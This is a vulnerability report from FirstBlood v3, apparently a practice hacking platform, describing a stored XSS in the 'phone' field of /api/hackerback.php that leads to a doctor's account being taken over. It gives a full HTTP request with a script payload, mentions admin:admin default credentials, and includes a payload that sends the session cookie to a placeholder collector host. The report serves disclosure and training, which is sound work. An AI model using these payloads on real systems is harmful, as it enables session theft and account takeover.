FirstBlood-#1377 — Stored XSS on drpanel after joining hackerback can lead to account takeover
This issue was discovered on FirstBlood v3
On 2022-12-09, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing great today!
I found a stored XSS vulnerability on /api/hackerback.php. The phone parameter is reflected into the source code without being filtered or escaped correctly on /drpanel/index.php
.
Possible cause:
The developers may have underestimated that the endpoint could also be invoked directly, initially, they've only set an input field that accepts digits only.
Impact:
I was able to execute javascript code on any doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.
Steps to reproduce:
1) First of all, you'll need to join the event, to do so, replicate the following request:
POST /api/hackerback.php HTTP/1.1
Host: <HOST>
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
full_name=xyz&phone=<script>alert(document.domain)</script>
- Next, log in on
/login.php
and sign in with the default credentials admin:admin
.
- A popup should be displayed with the document's domain:
Now, since we're targetting authorized accounts, we can elevate our privileges by easily taking over the doctor's account as cookies are not set to be HTTPOnly. To do so, we could put the following payload in the phone parameter to steal and send the cookies back to us:
<script>location.href=`//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}`</script>
Next, visit the endpoint again: /drpanel/index.php
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation
I highly recommend encoding any user input and validating it before reflecting it in the response.
Thanks for hosting such an awesome event again!
Kind regards,
0xblackbird
P1 CRITICAL
Endpoint: /api/hackerback.php
Parameter: phone
Payload: <script>alert(document.domain)</script>
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.